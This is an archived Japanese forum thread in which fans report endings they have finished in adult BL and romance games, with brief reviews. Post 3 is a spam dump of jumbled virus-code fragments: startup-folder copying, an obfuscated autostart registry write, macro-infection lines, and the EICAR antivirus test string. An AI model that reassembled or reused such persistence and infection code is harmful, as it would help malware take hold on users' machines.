5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

大人向け恋愛ゲーで誰かのEDを見たらageるスレ2

1 :いけない名無しさん:2007/08/16(木) 05:09:45 ID:???
大人向けの恋愛ゲーム(ジャンル問わず)で
誰かを攻略し終わったらageる。
ゲームタイトルと攻略キャラを必ず明記すること。
出来たらネタバレしない程度に感想も。

前スレ
大人向け恋愛ゲーで誰かのEDを見たらageるスレ
http://game12.2ch.net/test/read.cgi/gboy/1136477841/

2 :いけない名無しさん:2007/08/16(木) 10:01:33 ID:???
いちおつ

3 :いけない名無しさん:2007/08/16(木) 17:28:50 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :いけない名無しさん:2007/08/17(金) 22:01:45 ID:???
>>1 乙です

Under the Moon セイジュ愛憎ルートED全部

これでレニと隠し以外全員クリアしたが、今までで一番辛かった
家の中でも外でもエロエロエロエロばっかり…
エロゲだしエロが多いのは歓迎してたんだが、主人公が何してようが
ちょっとしたきっかけでエロに持ち込みその度淫乱とか罵倒されるのは頂けなかった
淫乱だの色情魔だの言われても、それはむしろお前だろと言いたくなった(´Д`;)

エロ以外の部分でも異様な独占欲の強さとか殺人未遂とか、
男のヤンデレの怖さが分かった気がするシナリオだったよ…
気遣かってくれるカイルに癒された
純愛ルートのセイジュにはわりと萌えたんだけどな

あとちょっとだし、FDの一般販売までにコンプしたい

5 :いけない名無しさん:2007/08/19(日) 03:12:51 ID:???
咎狗 nエンド でフルコンプ
おい、ケースケ!そんなとこで目の前であ○○んするなよ!
nに集中したいのに気になっちまうじゃないか!
ラストの髪染めたnが最高にオトコマエでした。
いいゲームだったと思う。でも萌えはなかった。いいゲームだったけど。

6 :いけない名無しさん:2007/08/19(日) 04:10:30 ID:???
>>4に便乗して。
昨日、レニのエンディングをC以外見て、カイルの愛憎ルートを一つ見た。
そして今、セイジュの愛憎ルートを一つ見た。
私もカイルに癒された…そしてレニが心配してくれる度にコロっといきそうになったよ…もうなったけどw

ヤンデレ、初めて見たけどすげぇ。全部コンプ出来るかな。不安。

7 :いけない名無しさん:2007/08/21(火) 05:23:54 ID:???
ラメントようやっと一つクリア。アサコノだけど長いよ。泣けたが。
次はライコノをやろうと思うが時間がかかりそうで気が滅入る。
しかし猫の中ではライの耳が一番カワユス。
オヤジスキーではないのでバルコノはやる前からイラネと思っている。



8 :いけない名無しさん:2007/08/21(火) 05:26:57 ID:rbVnY+4H
鬼畜眼鏡 本多でフルコンプ
バッドエンドでフルコンプか…と思いつつ、
本多の「克哉、早く来いよ!」がなんか可愛くて和んだ

全体的には素直に楽しめたし…まあ突っ込みどころは色々とあったけど面白かった

9 :いけない名無しさん:2007/08/21(火) 13:59:28 ID:9nWDrrDT
ピヨの皐月ED
一部リバありなんは知ってたけど、皐月受けは無理だたorz

10 :いけない名無しさん:2007/08/22(水) 05:42:14 ID:???
>>7
惜しい…。
そう言いながら嵌った人もいるんだけど、
まあ後悔するのは本人だからやらなくていいよwww



しかし勿体無い…。

11 :7:2007/08/22(水) 09:39:33 ID:???
>>10
いや、一応フルコンプするけどね。フルコンプしないと見れないもの
とかあるだろうし。もし嵌ったらまたカキコするよ。

12 :いけない名無しさん:2007/08/22(水) 13:45:30 ID:???
スキップは未読でもできる
このことを覚えておいてくれ

13 :いけない名無しさん:2007/08/23(木) 06:57:25 ID:???
>>10バルコノ厨きめぇよ

>>11フルコンプがんばれ
長いけどな、ライコノはめちゃ萌えるぞ!(*´∀`)

14 :積み480:2007/08/25(土) 19:27:41 ID:???
初・BL!
学園ヘヴン
とりあえず順番(?)に王様、郁ちゃんクリア
なかなか面白い…キャラみんな憎めないなあ
しかしまだ自分のBL好みがわからない
乙女的にみるなら七条さんなんだが…

15 :いけない名無しさん:2007/08/26(日) 01:08:54 ID:???
UTM ゼロ

他のキャラは「俺が辛いのはお前のせい」と攻める奴ばっかだったが
ゼロは最後まで優しくてよかった。愛憎無いし。

あとは最後の隠しルートでコンプだー

16 :いけない名無しさん:2007/08/26(日) 08:28:00 ID:???
コイビト遊戯 芳賀
good endだったので、普通に感動した。
めちゃ愛のある感じ。
これが、bad endになるとどうなってしまうのか
wktkのようなgkblのような…

17 :いけない名無しさん:2007/08/26(日) 15:56:51 ID:???
玉響・久瀬ルート全ED

脇カプともどもなんて唐突なエチ突入…
しかしみんなかわいいからいいや(*´∀`)
普通の主人公総受けゲームなら攻めになるはずの
ポジションにいる攻略キャラクター3人が、
見事なまでに全員ヘタレだからなあ…
ラストの弁護士かわいすぎるよなんだあの30代

あ、積みゲスレ450です
水辺で涼んできましたありがとう

18 :いけない名無しさん:2007/08/27(月) 02:33:18 ID:???
ラメント ライルートクリア

ツンデレ好きにはたまらない。
でもアサコノやった時はライがかわいそうになったのだが、ライコノでは
アサトがかわいそうだ。いったいどうすれば…。


19 :積み480:2007/08/27(月) 19:20:39 ID:???
学園ヘヴン
七条さん、中嶋さんクリア
とりあえず自分に眼鏡属性は全く無いことが分かった
次は弓道の人とテニスの人だ!

20 :いけない名無しさん:2007/08/27(月) 19:21:25 ID:???
age忘れてたorz

21 :いけない名無しさん:2007/08/28(火) 05:55:50 ID:???
ラメコンプ

受けだけいい思いをして、当て馬にされる攻めが身を引くのは萎えるテンプレだわ

展開が3つとも全く一緒だったのには吹いた
馬鹿みたいに長いんだからそこは捻れよ
これキャラ萌え出来ないとやってられない

22 :いけない名無しさん:2007/08/28(火) 07:31:50 ID:???
コイビト遊戯 大貴ED
マジすごかった…
自分、男向けはやらないのでボブゲで初めて見た。
めちゃ感動したけど、これはプレイする人を選ぶかも…

23 :いけない名無しさん:2007/08/28(火) 20:29:06 ID:???
UTM つきいろ絵本
セナ
EDスチルの2人の幸せそうな笑顔で泣いた
中の人の演技もよかった

24 :いけない名無しさん:2007/08/28(火) 20:56:33 ID:???
学園ヘヴン
篠宮さん、成瀬さんクリア

…篠宮さんが受けならいいのに、とか思った。
自分、まさか、俗にいうマイナー…
いやいや!まだわからないじゃないか!

よし、次はちびっこ2人だ

25 :いけない名無しさん:2007/08/29(水) 02:31:20 ID:???
UTM カイル 愛の〜&夢か〜 ED

カイル最萌なんだぜ(´ー`)?
後はゼロ、ユナン、セナだ‥!

26 :いけない名無しさん:2007/08/29(水) 14:14:38 ID:???
LL ロディ

これはいい鬱ゲ
予想外すぎてちょっと涙が…

27 :いけない名無しさん:2007/08/29(水) 16:10:10 ID:5eO52pvd
UTM つきいろ絵本 レニ

やはり最萌えからやってみた。
(油断してたらパパEDにいっちゃって焦った)
うん、今回も萌えをありがとう。


28 :いけない名無しさん:2007/08/30(木) 21:37:48 ID:???
ラメントやっとフルコンプ
バルコノ思っていた以上にキモイ。
バッドエンド回収はこれから。

29 :いけない名無しさん:2007/08/30(木) 22:02:47 ID:???
UTM レニ

FD出たのに今更本編買ってやってみた。
良かった!!初めてゲームしたのがUTMで良かった!
ただしセイジュにちょっかい出しすぎてラストにヒロイン殺されてしまったorz

30 :いけない名無しさん:2007/08/30(木) 23:23:11 ID:???
学園ヘヴン
滝、先生クリア

滝可愛いなあ…
というかこの2人相手だと攻めなのね。
攻めのが自分には合ってるかもしれない…
ちょっとずつ好みがわかってきたw

さて、次は岩井さんと和希で締めかな!

31 :いけない名無しさん:2007/08/30(木) 23:24:12 ID:???
age忘れた!
あげあげ

32 :いけない名無しさん:2007/08/31(金) 00:38:47 ID:kTi6GyMn
コイビト遊戯
 滝沢グッドED
  諒グッドもよかったけど滝沢もいいなぁ。
  グッドEDももうちょっと長かったらなぁ!惜しい!その続きが見たいんだ!

 諒バッド・諒&滝沢二股バッドED?
  いくらやってもバッドにいかないからとうとう攻略サイト見ちゃったよ。
  やはりこのゲームはバッドEDが濃いのなw
  諒がこわいいいい。いっちゃってるよ。

33 :いけない名無しさん:2007/08/31(金) 00:57:23 ID:XVOFvsEs
>>32 それ詳しく!!

34 :いけない名無しさん:2007/08/31(金) 01:14:26 ID:???
>>33
そういうこと聞くスレじゃないから。
本スレ行くといいよ。

35 :いけない名無しさん:2007/08/31(金) 02:39:53 ID:???
つきいろ ゼロ ED両方

本編ではあまり好きじゃなかったのに・・!やられたw
ゼロの事が好きになりました(*´Д`)'`ァ'`ァ

36 :いけない名無しさん:2007/09/01(土) 00:44:41 ID:???
学園ヘヴン
岩井さん、和希クリア
和希も受けでいい気がしてきた
そうかやっぱり自分マイナーなんだアハハ(゚∀゚)ハハ

よし、これでフルコンかな!
促進してくれた姐さん方ありがとう
次は咎狗やってみようかな〜

37 :いけない名無しさん:2007/09/01(土) 01:42:23 ID:P+tklCZY
UTM つきいろ絵本
カイル
本編ではかわいいなぁで終わったけど今回カッコよくてびっくりした
萩さんの声好きだ

38 :いけない名無しさん:2007/09/01(土) 02:34:31 ID:???
恋愛破局請負人  薫ルートクリア

積みゲー崩し●本目w
大本命を先にクリアしてしまったorz
他のキャラも萌えられると良いのだが。

39 :いけない名無しさん:2007/09/01(土) 20:00:58 ID:???
ぷり・プリ ラインハルト全部

紳士だと信じていたんだが…
終盤はただひたすら怖かった

40 :いけない名無しさん:2007/09/02(日) 23:16:31 ID:???
コイビト遊戯フルコン!
自分にはありえない速さでのフルコンプ。

大貴エンドにゾクゾクした。
○○には萌えないが、その後の黒い独白がたまらない。
あと滝沢BAD萌え、芳賀えちー萌え。

でも全体的にはそう変態でもなかった…かな(一部除く)
総合的には満足できた

41 :いけない名無しさん:2007/09/03(月) 13:15:20 ID:???
コイビト遊戯フルコンプ

滝沢に萌えた
なんですか、この可愛い生き物…!!(*´д`*) ハァハァ

BADエンド群の鬼畜度は黒十や仮面より高かったと思う
和泉澤と櫻井のBADは凄かった
そして兄ちゃん、血糖値が上がってしまうぞ

ぶっちゃけコイビト遊戯の製作がピルスラじゃなかったら、
もっと良かったかも、と思ってしまった
全体的にピルスラ色が濃すぎた

42 :41:2007/09/03(月) 13:16:30 ID:pv+oWg9G
間違ってsageてしまった…orz

43 :いけない名無しさん:2007/09/03(月) 14:40:33 ID:???
コイビト遊戯怪物ED
諒にげて超にげて

44 :いけない名無しさん:2007/09/03(月) 18:16:18 ID:???
咎狗の血
ケイスケ・リン・源泉クリア

暗くて長いのを何回も繰り返しはちょっと辛い
期待しすぎたかなー…
やっぱり自分はマイナーらしく、
おいちゃん受けでいいじゃんリンは攻めで(ry

よし、次で一気にフルコンしよう

45 :いけない名無しさん:2007/09/03(月) 18:18:07 ID:???
age忘れorz

46 :いけない名無しさん:2007/09/03(月) 22:38:13 ID:???
絶服
真相ルートでコンプ
正直話に萎えた
お前が本命ってのはレビュ見てたから知ってたけど
すげーもにょもにょした

47 :いけない名無しさん:2007/09/04(火) 00:03:33 ID:???
UTM セイジュ 愛憎全部

巷で辛いと評判だったから覚悟してかかったけど
ありえないほど萌えた。中の人の演技も最高だ!
鬱屈したキャラが大好きだと再確認…。
純愛ルート今から逝ってくるけど満足できるか不安だ。

48 :いけない名無しさん:2007/09/04(火) 03:02:06 ID:???
咎狗 シキED1クリア

泣けるって聞いてたけど、マジでボロ泣きするとは思わんかたw
このシキアキは恋愛っつーより相手の存在そのものを大事にしてるように感じた
これみて、そら人気出るわと納得

あとは軍と淫靡かな?楽しみだ

49 :いけない名無しさん:2007/09/04(火) 10:37:40 ID:???
咎狗の血

BAD×3、シキ×3、nクリア

これでフルコン…かな?
なんというか、凄い良作なんだろうが
好みではない、なあ…残念
音楽は素晴らしいと思った
あと自分やっぱりマイナー\(^o^)/

次は絶対服従命令とやらを崩そう
暗くて長いのは疲れる…

50 :いけない名無しさん:2007/09/04(火) 10:38:56 ID:???
だああまたage忘れorz

51 :いけない名無しさん:2007/09/04(火) 22:26:23 ID:???
絶対服従命令

キアルート
エド・イェンス・アリークリア

早!クリア楽だなこれ…
そしてH多い上展開早いよ
あとなんか文章おかしいような気がする

でも楽しい…こういう攻めって新鮮だ
よーしサクサク次いこう!

52 :いけない名無しさん:2007/09/04(火) 23:10:21 ID:???
ぷり・プリ フルコンプ

従者可愛いよ従者
彼には是非幸せになっていただきたい

53 :いけない名無しさん:2007/09/04(火) 23:16:46 ID:???
絶対服従命令
真相ルート、ルイキア?
ルイーズ受けが見たかったけどキア受けになってビクーリ!
ルイーズ受けが見たい。

好きしょ!1と2
1は広夢ルート。甘え受け萌えた。思わずオカズにorz
2は真相エンド。空直のラブラブ見たいんで早く3やりたい。


54 :いけない名無しさん:2007/09/05(水) 18:58:09 ID:gNxXqGDK
絶対服従命令

キアルート
ディルククリア

ルイーズルート
アネル・フェルディナント・ハーゲンクリア

今までで一番萌えたかもしれない
ディルクのような受け…好きだ
あとおっさん受けwやっぱりマイナーwww

文章とか色々突っ込みたいけど、やってて楽しいなこのゲーム
しかしBLのHシーンはまだ慣れないのでスキップ!スキップ!
明日丸々休みだし、フルコン出来るかな〜

55 :いけない名無しさん:2007/09/05(水) 20:05:49 ID:???
自分の娘くらいの年頃のロリ娘のわれめは描けるのにね

56 :いけない名無しさん:2007/09/05(水) 20:08:28 ID:???
ごばっ

57 :積みゲ510:2007/09/06(木) 16:34:30 ID:DuCVqZDZ
咎狗ケイスケENDクリア

お勧めに従って、まずはケイスケルートからいってみた
キマってる時のケイスケの怖さに思わずガクブルしたけど
ちゃんと愛あるえちーで結ばれて良かったな
ケイスケがアキラァを気遣う様が切ないのに暖かくてたまらんかったです
何よりも、乙女乙女していない受けがこれほど萌えるとは
夢にも思わなかったよハァハァ

次は可愛い顔して男前なリンを攻略してくる
促進してくれた姐さん方に、心からありがd

58 :いけない名無しさん:2007/09/06(木) 18:41:26 ID:???
絶対服従命令

キアルート
シルヴィオ・ティモクリア

ルイーズルート
ロウレス・ジョレス・ヴェルナークリア

真相ルートクリア
ALLランククリア

終わったー!
意外とショタもいける!こっちが攻めなら!
でも真相…キアのお母さんて…
ま、まあでも面白かったしね!

よし残り二本だ。
玉響という方からやってみよう( ^ω^)

59 :いけない名無しさん:2007/09/07(金) 00:05:46 ID:???
玉響

透夜×俊一(リバ)-久瀬×遼(リバ)、BADクリア

Hがちょっと唐突な気がしたけど
今までやった中で一番話が面白いかもしれない
というかこれHいらなくないか?

…でも遼さん可愛いかったなー

60 :積みゲ510:2007/09/07(金) 15:46:10 ID:hFTY57ao
咎狗フルコンプ

リンルート
わだかまりが解けた後、縋ってきたリンが可愛すぐる
そしてエンディングでの男っぷりに萌え泣いた

シキルート
「好き」という気持ちを手酷い行為の端々に滲み出してる
シキの不器用さと純粋さに泣いた
この二人ならこういう形の恋愛もアリなんだろうけど
何だか悲しかった

源泉ルート
守りたいものが出来た人ってのは強いんだな
それがおっさんとなれば萌えずにはいられないw
大人の余裕とスキンシップに物凄く癒されたよムッハー

nルート
nはモブっぽいと思っていた時の自分を全力で殴りたい
最後、nが人としての感情を表に出せるようになった時点で涙腺決壊した
たくさんのものを失ったのは辛いし悲しい事だけど、
それだけじゃない前向きさが感じられて良かった

各BAD
ためらいつつも思い切ってプレイ。
ドライバーキター変態キター処刑人キター!!!!!!!!!!!
だけど流石に腸はキツかった…orz

いやー、大変美味しく頂きました。
という訳で残り2本、よし次はLL行くぞ

61 :いけない名無しさん:2007/09/07(金) 20:13:23 ID:X5L3kEHh
尼から玉響キター
事前に内容ほとんどチェックしてないから楽しい。

・久瀬×主人公、主人公×久瀬ED
 ちょwwwまさか久瀬さん受があるとは(*´Д`)
 好物の主攻のゲームは大体消化しちゃって、主受メインばっかりだったから嬉しい!
 鼻血でる!

・夕貴×主人公BAD(?)
 蛇エロス。腹黒攻めイイヨイイヨー。

その他いくつかBADED。
どこかのルートの夕貴×遼も良かった。つか触手(蛇)多いw
家政婦さんがちょっと鬱だ…(´;ω;`)
普通の鬱ゲーは好きなのに。

今また尼から鬼畜眼鏡とコイビト遊戯もキター
勢いで注文したの忘れてた、攻略追いつかないwww

62 :いけない名無しさん:2007/09/07(金) 20:35:10 ID:???
玉響

透夜×遼(リバ)-久瀬×俊一(リバ)クリア、BADオールクリア

ここ最近の平均睡眠時間が3時間w
でも楽しい…話一番好きだこれ
スキップ使いまくってるけどNE!

あとは久瀬×透夜(リバ)と透夜×夕貴の真相ルートか
明日の楽しみにして、さて仕事行って来よう

63 :いけない名無しさん:2007/09/07(金) 20:54:47 ID:xCpDw264
Under the Moon つきいろ絵本
とりあえず双子以外一気にオワタ
ゼロそれありかwwと思ったけど話的には一番好きかも
今回、最初の選択で目当て以外一切出てこないのにはびっくりしたお

64 :いけない名無しさん:2007/09/08(土) 19:17:41 ID:???
玉響

透夜×久瀬(リバ)-俊一×遼(リバ)クリア
透夜×夕貴(リバ)クリア
ついでに透夜-俊一ルートの取り損ねCG回収

フルコン!
何周かするとさすがに一本道すぎかと思った
でも話面白いしリバでキャラ違うの楽しい!
俊一×遼さんが一番好みかも
2人とも可愛いなーwww

ラスト一本!
俺の下であがけ…
タイトルからしてwktkが止まらんぜよ
しかし箱でかいwww

65 :いけない名無しさん:2007/09/08(土) 19:49:31 ID:j6EE8fcP
LLフルコンプ

こ れ は 良 い シ ョ タ
ヨアンかわいいよヨアン
リバなグレッグもイイヨイイヨー

どのルートもむず痒くなる甘々展開だけじゃなかったのが良かった
フルコンプ後、ずっしり来る重さと鬱加減がたまらん
脇キャラも良い味出してたと思う。特にトマとピエールが大好きだw
いっそこの2キャラも攻略可能にして欲しかったな、ほのぼのエンドとして。
あと、アビーが不憫すぎる…。・゚・(ノД`)・゚・。

安かったから買ったは良いものの、改めて見ると徹底的に
ショタ路線なのが積む理由の一つだったんだけど、
食わず嫌いせずにもっと早くやってれば良かったな
想像していたよりもずっと面白かった

残すはLamento
長いらしいけど楽しみだー(*´д`*)

66 :いけない名無しさん:2007/09/08(土) 21:31:15 ID:???
汁馬鹿  フルコン

シーンとシーン繋ぎが全体的に不足していて
いつの間にかカプになっていつの間にか敵を倒して
いつのまにかEDになってた

シナリオは思っていたよりもまともに読めたかな
ズイキの方がヘンテコ度が高い
間違った方向に迷走しているんだな…

67 :積みゲ530:2007/09/09(日) 03:25:42 ID:???
ファナティカ 崩壊ED

かなり不安を感じながら始めたけどシナリオ、スチルは満足
ただ、カーティスの中の人に違和感
好きな声優さんだが、今回はもう少し若々しく演じてほしかった
声の落ち着きのせいか、必死さが感じられなくてEDに唐突感
突然どうしたの!みたいな感じで
END寸前の嫉妬から壊れるって流れは好きなんだけどなぁ

アーもカーも単独行動が多すぎ、特にカーは無防備すぎ
いつリーウェンとソウハに喰われるかと
始終ハラハラさせられっぱなしで妙に疲れた

68 :いけない名無しさん:2007/09/09(日) 18:29:45 ID:???
俺の下であがけ

樋口攻受クリア、BADクリア、過労死クリア、ハーレムクリア

何 だ こ の 楽 し さ

玉響が比較的暗かったからかこの馬鹿っぷりがたまらない!
でも樋口のBADは泣いた…切ない

そして初めてHシーンをスキップしませんでした。
樋口攻めのBAD\(^o^)/ヤベエ
なんか自分の趣味がわからねえよ…
わかればわかるほど怖いよ

次は新とお父さん
吉岡さんはラストに取っておこうかな!

69 :いけない名無しさん:2007/09/09(日) 19:38:01 ID:???
月影
遊佐ED
一輝EDでフルコンプ
なんだかみんな危なっかしいカプだな
二年くらいはよさそうだけど五年後は別れれるんじゃ…
許婚以外は好きになったのも唐突な感じは否めない

70 :積みゲ530:2007/09/10(月) 01:53:59 ID:???
ファナティカ ずっと貴方の側にED

崩壊EDより引き込んでくれる綺麗なシナリオでした
このルートは悲恋というよりすれ違いがテーマかな
懸念の脇エロも萌えはしなかったけど楽しめた

だけど、あの男は駄目すぎ
今までやってきたBLゲの中でもぶっちぎりの駄目男だったよ
あれが主カプ片割れかと思うと先が暗くなる
次は少しでも救いのあるEDに辿り着いて気分を払拭させたいな

71 :積みゲ550:2007/09/10(月) 08:42:49 ID:???
空の森

高浜×貴志ED、貴志×小野田ED、貴志×真央ED

小野田がとても不器用さんで、表情や仕草がとてもしおらしい!!
んでもって、中/井さんの低音受け声にハァハァ(*´Д`;)か、かわいいよ、小野田ー!!
ボブゲで出会えるとは思ってもみなかったw量が少なめなのが残念。
エチのときの二人の初々しいやり取りにも萌えた!
でも、あの小動物はいらんがなー!!!ヽ(`Д´)ノ

なんというか全体的に重い。ゲームの雰囲気なのかもしれんが。
エロゲメーカーが作ってるから期待したが
あまり汁だくな感じでなかったので少し拍子抜けした。
はやくオヤジ受けを堪能したいW

72 :いけない名無しさん:2007/09/10(月) 17:20:04 ID:???
月影
先生エンド
KOEEEE
バッドルートに入ったとしか思えなかった。
つかバッドならかまわないけど
公衆の面前でバイブ調教とか勘弁して…
まわりにはばれてない事にはなってるけどさ

73 :いけない名無しさん:2007/09/10(月) 19:22:50 ID:???
俺の下であがけ

新クリア、BADクリア、山口さん攻受クリア、BADクリア、10億クリア

新攻めってないのか…失踪って/(^o^)\
何気に期待してたのになあ
やんちゃっ子攻め…
あと山口パパ使い回しすかwww

残すは吉岡のみ!
…だよね、多分。
あーなんか寂しいなあ

でも尼から新しく5本来ました\(^o^)/
わっしょい!

74 :いけない名無しさん:2007/09/11(火) 18:55:45 ID:???
俺の下であがけ

吉岡攻受クリア

フルコンプ!
吉岡×壱哉様すごく萌えた…(*´∀`)

というわけで以前までの積みゲは崩し終えました
楽しかったー!
少しはBL慣れしたかなw

さて新たに指定してもらったメサイアというのをやってみよう
エロいのか…ドキドキ

75 :積みゲ530:2007/09/12(水) 01:18:18 ID:???
ファナティカ 皆既月食・永遠の二人ED

皆既月食
BADだけど面白かった
ここまで救いがないといっそ清々しい
そしてやっぱり先生は駄目男だった

永遠の二人
銀ちゃん可愛いので幸せになれてよかったねED
やっぱり先生は(ry

主カプ挿入エロには未だ辿り着けず…
さっさと突っ込みやがれ!と夜な夜な叫びそうになる
アーヤのレクチャーそろそろ飽きたよ

76 :いけない名無しさん:2007/09/12(水) 02:39:36 ID:???
メサイア
煌BAD二種+煌ルートBAD二種

ラブラブえちキター!って思ったら、何やら不穏な台詞

まさかな…フラグも立ってるし、好感度だって上げまくったし!

え、ちょ、なに拳銃とか構えてんの。やめてー!

orz

GOOD狙いでプレイ始めて立て続けにBADで凹んだ。
煌の声優さん、凄くいい仕事してくれてるけど、
喋り方が遅くてついカットしてしまう。
それにしても噂に違わずえろシーン(喘ぎ)の長さに絶望した!


77 :いけない名無しさん:2007/09/12(水) 03:28:29 ID:???
コイビト遊戯
芳賀&滝沢二股エンド

芳賀wコイツが一番変態な希ガス
でもその変態ぶりに最萌えますた。つかヘルシーは喘ぎがエロくて良いなw

78 :いけない名無しさん:2007/09/12(水) 04:05:34 ID:???
王宮夜想曲


リオウED
このゲーム、絵があんま好きじゃないし、スキップもあんま使えないし
教育も慣れれば途中からおんなじこと繰り返しの忍耐ゲーかと思いきや
とんでもなく萌えた!中の人GJ!
暗殺モードと楽士モードでの声の使い分けがよかった!
シナリオも好みど真ん中ついてたし。楽士可愛いよ楽士。
その前にやってたキャラの時はスチルのタイミングが無理矢理感溢れてたけど
今回は自然だったし。
更にハッピーエンドのスチルに心臓打ちぬかれた。まさかこの絵師のスチルで萌える事になるとは・・・


よし、次は弟いってみるか。さっきやっとEDリスト見つけて弟も攻略可能な事に気づいた。
初めは、期待してたゲーム性も微妙な上スチルもスキップも駄目だから
このまま積みゲーかと思ってたんだけど楽士で見方変わった。
加えて弟攻略可情報によってなんかやっとこのゲームにwktkしてきてるw



79 :いけない名無しさん:2007/09/12(水) 04:09:44 ID:ImpPYgYJ
しまった、age忘れスマソ

80 :いけない名無しさん:2007/09/12(水) 05:39:03 ID:ST48pY5b
帝国千戦記

貴紗絡goodED  時間が二人の距離を縮めるってなんかいいよね・・・萌えた
燕旺珂goodED 白死んじゃらめえええ(´Д⊂ヽ
氷霧純愛コンプ  まさか自分が天然受けに嵌るとは思わんかったですたい。感動したー。
新たなる旅立ちED 白とか李とかコンビの片割れが去ってしまってなんでー!と思ったら
攻略キャラが残ったのか。このルートでも氷が楽しそうでお母さん嬉しいよ・・・

よし次は史だ!

81 :いけない名無しさん:2007/09/12(水) 17:32:53 ID:???
絶服アネル
短いなー。他のもこんなに短いのだろうか
早く主人公カプが見たい

ピヨたん山崎
一昔前のBLを読んでいるようだ…
萌えは全くないが、なんだか楽しくなってきた
早く里村EDが見たい

82 :いけない名無しさん:2007/09/12(水) 23:57:08 ID:???
咎狗の血 コンプ↓やった順

処刑人BADセット
性格、見た目、演技的にツボだった

源泉ルート
長話の各シーンに癒されたし楽しかった
えっちシーンへの導入が少々強引な感じがした

ケイスケルート
とにかく中の人の演技がよかった!
感情が迸りまくってて楽しめた

リンルート
かわいい系は苦手なんだけど豹変ぶりと男前っぷりはガチ
特にえっちシーンの男前受ぶりはよかった

シキルート
えっちシーンは俺様キャラとしては薄味で中途半端な感じがした
行間を読ませる感じでネタとしても楽しめる気がする
終盤の展開に燃えた

nルート
他ルートと違い自ら対象者へ近づいていくアキラの動きが新鮮
二人で話をする各シーンが面白かった
他ルートをクリアした後でないとnルートができないと言う仕様は正解だと思う

エマ・グエン・猛(ルート外感想
エマの話が面倒で飛ばしてしまうと言う話を聞いていたけど声がよかったせいか全ルートでじっくり聞いてしまった
各ルートで話す内容が微妙に違うのでその違いを楽しんだ
グエンは存在が薄くて残念だった
もう少しエマとの関係性を出して欲しかったし何より喋って欲しかった
猛は本当に不遇なキャラだと思う
もしかしたら咎狗内で一番かわいそうなキャラなのでは。。

83 :いけない名無しさん:2007/09/13(木) 02:15:11 ID:JUEM4/C7
ばーでー 
的×和トゥルー
前は眼中になかったんだけどFDやったら興味出てきたからやり直してみた
( ;∀;) イイハナシダナー
主人公3人ともかわいくて仕方ない
椿は○ね

84 :いけない名無しさん:2007/09/13(木) 05:35:34 ID:???
コイビト遊戯 フルコンプ
ボブゲ3作目にしてこれを選んだ自分に少し後悔を覚えた…
グッドEND以外のENDがあまりにも鬼畜と変態すぎて放心状態と恐怖感を覚えた。しかしかなり萌え所もあったのでプレイして良かった。
しかしコンプ前の最萌えがかなりムカつくし怒りを覚えたので最萎えに変わりました。
それにしても和泉澤兄弟恐すぎっ…

85 :いけない名無しさん:2007/09/13(木) 05:37:32 ID:oobO+SWy
sageてしまったすんません…

86 :いけない名無しさん:2007/09/13(木) 18:15:58 ID:???
積みゲ崩し560です

メサイア

煌BAD×2、エンド1、トゥルークリア

え…エロいってレベルじゃねーぞ!
初っ端からぶっ飛ばしててどうしようかと…
長いよエロ!自分にはまだ高度過ぎでした\(^o^)/

でもストーリー凄く深いな
煌さん見た目は私的に受けだけど
やってみたらなかなか素敵な攻めでした

次は遼太君ですね
ボリュームあるから期待!

87 :いけない名無しさん:2007/09/13(木) 23:46:30 ID:???
ラメント バルドED

中盤までは長くてだれ気味だったけど、終盤〜EDで一気に萌えた。
特にEDは最高だった!一番好みな展開!バルド可愛いよバルド。
あのスチルは反則だわ。

88 :いけない名無しさん:2007/09/14(金) 18:45:56 ID:???
メサイア

遼太BAD、END1クリア

BADトラウマになるかと思った\(^o^)/
心が痛い…

そして昨日みた煌さんエンド2はトゥルーではなかったのね
てっきりトゥルーだと思ってデータ上書きしましたよ…orz



89 :いけない名無しさん:2007/09/15(土) 20:47:45 ID:WpQ3lB7V
積みゲ崩しスレの440です。随分遅くなりましたが
のーとん 兄貴ルートコンプしました

今まで兄弟萌属性はなかったけど、今回で開眼してしまったかもしれんwwww
この二人の後日談が早く見たいなぁ
それにしてものーとんの可愛いよのーとん
追加ディスク発売までにコンプ頑張るぞ!!

90 :いけない名無しさん:2007/09/15(土) 21:36:06 ID:Ge2NBpsp
コイビト遊戯 芳賀グッドED

長い間放置してて久々にプレイ。
うがー!!なんでこれからってときに終わるんだよぉぉぉ(´;ω;`)
自分をおさえるために両手縛る流れにキュンときた。
だからこそその続きが見たかったのにー!
・・・・>>77みて、二股EDいってきまつ。

91 :いけない名無しさん:2007/09/15(土) 21:48:12 ID:???
メサイア

遼太ノーマルエンド、グッドエンドクリア

グッときた…!
個人的にはこっちのが好きかも。
あとは煌さんトゥルーのみ、かな
しかし長いんだぜ…!

これクリアしたら何にいこう。
birdieというのが良さそうだ

92 :いけない名無しさん:2007/09/15(土) 22:43:49 ID:Ge2NBpsp
コイビト遊戯 芳賀滝沢二股ED

芳賀ぁぁぁぁぁ_| ̄|○
芳賀はグッドが良い。あんな変態にノリノリな芳賀なんて(´;ω;`)ブワッ
まあそういうゲームなんですが。
滝沢のほうは萌えますた。


93 :いけない名無しさん:2007/09/16(日) 00:08:20 ID:TQLAkHdT
連荘すまん。
コイビト遊戯 芳賀諒二股ED

二股ED、相手によって内容かわるの!?今更気づいた。
フルコンプは程遠い・・・。
滝沢との二股よりこっちのほうが萌えた(*゚∀゚)=3

94 :積みゲ530:2007/09/16(日) 01:40:53 ID:???
